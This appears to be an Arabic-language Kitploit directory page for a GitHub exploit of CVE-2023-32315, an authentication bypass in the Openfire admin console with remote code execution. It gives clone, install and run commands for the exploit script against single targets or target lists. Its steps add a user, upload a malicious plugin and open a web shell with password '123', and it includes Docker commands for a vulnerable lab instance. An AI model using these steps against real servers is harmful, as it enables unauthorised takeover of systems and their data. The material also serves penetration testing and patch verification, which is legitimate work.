Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-32315 — ثغرة تجاوز المصادقة في وحدة تحكم Openfire مع إضافة RCE | Kitploit
أدوات/GitHubGitHub/miko550/cve-2023-32315
المصادقة والترخيصتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقتطوير الحمولات
GitHubmiko550/cve-2023-32315

CVE-2023-32315

ثغرة تجاوز المصادقة في وحدة تحكم Openfire مع إضافة RCE

عرض المستودع
591210منذ 2 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-32315

ثغرة تجاوز المصادقة في لوحة تحكم Openfire مع إضافة RCE

الإعداد

git clone https://github.com/miko550/CVE-2023-32315.git
cd CVE-2023-32315
pip3 install -r requirements.txt

الاستخدام

python3 CVE-2023-32315.py -t http://127.0.0.1:9090
python3 CVE-2023-32315.py -l lists.txt

الخطوات

  1. شغّل الاستغلال
  2. سجّل الدخول باستخدام المستخدم المضاف حديثًا
  3. انتقل إلى تبويب الإضافات > ارفع الإضافة openfire-management-tool-plugin.jar
  4. انتقل إلى تبويب الخادم > إعدادات الخادم > أداة الإدارة
  5. ادخل إلى الويب شيل بكلمة المرور "123"

إصدار Openfire Docker المعرّض للثغرة

docker pull nasqueron/openfire:4.7.1
sudo docker run --name openfire -d --restart=always --publish 9090:9090 --publish 5222:5222 --publish 7777:7777 --volume /srv/docker/openfire:/var/lib/openfire nasqueron/openfire:4.7.1

المرجع

  • https://github.com/tangxiaofeng7/CVE-2023-32315-Openfire-Bypass
  • https://github.com/5rGJ5aCh5oCq5YW9/CVE-2023-32315exp
تنزيل الأداة